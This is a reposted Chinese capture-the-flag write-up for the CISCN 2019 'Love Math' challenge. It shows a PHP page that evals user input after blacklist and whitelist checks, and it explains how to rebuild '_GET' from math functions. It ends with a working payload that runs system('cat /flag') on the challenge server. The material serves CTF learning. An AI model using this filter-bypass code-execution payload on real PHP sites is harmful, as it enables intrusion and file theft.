码迷,mamicode.com
首页 > 其他好文 > 详细

[CISCN 2019 初赛]Love Math

时间:2020-07-13 16:52:52      阅读:83      评论:0      收藏:0      [点我收藏+]

标签:sch   没有   color   iss   ror   convert   str   __file__   array   

 1 <?php 
 2 error_reporting(0); 
 3 //听说你很喜欢数学,不知道你是否爱它胜过爱flag 
 4 if(!isset($_GET[‘c‘])){ 
 5     show_source(__FILE__); 
 6 }else{ 
 7     //例子 c=20-1 
 8     $content = $_GET[‘c‘]; 
 9     if (strlen($content) >= 80) { 
10         die("太长了不会算"); 
11     } 
12     $blacklist = [‘ ‘, ‘\t‘, ‘\r‘, ‘\n‘,‘\‘‘, ‘"‘, ‘`‘, ‘\[‘, ‘\]‘]; 
13     foreach ($blacklist as $blackitem) { 
14         if (preg_match(‘/‘ . $blackitem . ‘/m‘, $content)) { 
15             die("请不要输入奇奇怪怪的字符"); 
16         } 
17     } 
18     //常用数学函数http://www.w3school.com.cn/php/php_ref_math.asp 
19     $whitelist = [‘abs‘, ‘acos‘, ‘acosh‘, ‘asin‘, ‘asinh‘, ‘atan2‘, ‘atan‘, ‘atanh‘, ‘base_convert‘, ‘bindec‘, ‘ceil‘, ‘cos‘, ‘cosh‘, ‘decbin‘, ‘dechex‘, ‘decoct‘, ‘deg2rad‘, ‘exp‘, ‘expm1‘, ‘floor‘, ‘fmod‘, ‘getrandmax‘, ‘hexdec‘, ‘hypot‘, ‘is_finite‘, ‘is_infinite‘, ‘is_nan‘, ‘lcg_value‘, ‘log10‘, ‘log1p‘, ‘log‘, ‘max‘, ‘min‘, ‘mt_getrandmax‘, ‘mt_rand‘, ‘mt_srand‘, ‘octdec‘, ‘pi‘, ‘pow‘, ‘rad2deg‘, ‘rand‘, ‘round‘, ‘sin‘, ‘sinh‘, ‘sqrt‘, ‘srand‘, ‘tan‘, ‘tanh‘];
20     preg_match_all(‘/[a-zA-Z_\x7f-\xff][a-zA-Z_0-9\x7f-\xff]*/‘, $content, $used_funcs);   
21     foreach ($used_funcs[0] as $func) { 
22         if (!in_array($func, $whitelist)) { 
23             die("请不要输入奇奇怪怪的函数"); 
24         } 
25     } 
26     //帮你算出答案 
27     eval(‘echo ‘.$content.‘;‘); 
28 } ,

传递参数c,参数c有如下限制:
1、长度不能超过80
2、不能包含‘ ‘, ‘\t‘, ‘\r‘, ‘\n‘,‘\‘‘, ‘"‘, ‘`‘, ‘\[‘, ‘\]‘这些字符
3、只能含有$whitelist中出现的单词

总的意思就是我们需要通过数学函数和没有禁用的字符构造读取flag的语句,可惜本人太菜,不知道如何构造,总结一下其他大佬的博客。

一般来说flag位于根目录下面,也就是构造语句为?c=system("cat /flag")

因为引号是禁用的,我们需要将system和cat /flag分离

?c=($_GET[a])($_GET[b])&a=system&b=cat /flag

因为a和b不在白名单中,所以需要更换为白名单中的单词,比如abs,acos,php中函数默认为字符串。c参数中的GET,中括号是禁用的,中括号可以使用{}代替,难点在于如何构造c参数_GET,答案如下:

base_convert(37907361743,10,36)(dechex(1598506324))

base_convert(37907361743,10,36)=>"hex2bin"
dechex(1598506324)=>"5f474554"
hex2bin("5f474554")=>_GET

使用一个pi变量保存base_convert(37907361743,10,36)(dechex(1598506324)),尽量选取白名单中较短的单词,如pi,cos等

最终payload:

?c=$pi=base_convert(37907361743,10,36)(dechex(1598506324));($$pi{pi})($$pi{cos})&pi=system&cos=cat /flag

 

 

 

 

[CISCN 2019 初赛]Love Math

标签:sch   没有   color   iss   ror   convert   str   __file__   array   

原文地址:https://www.cnblogs.com/gtx690/p/13294040.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!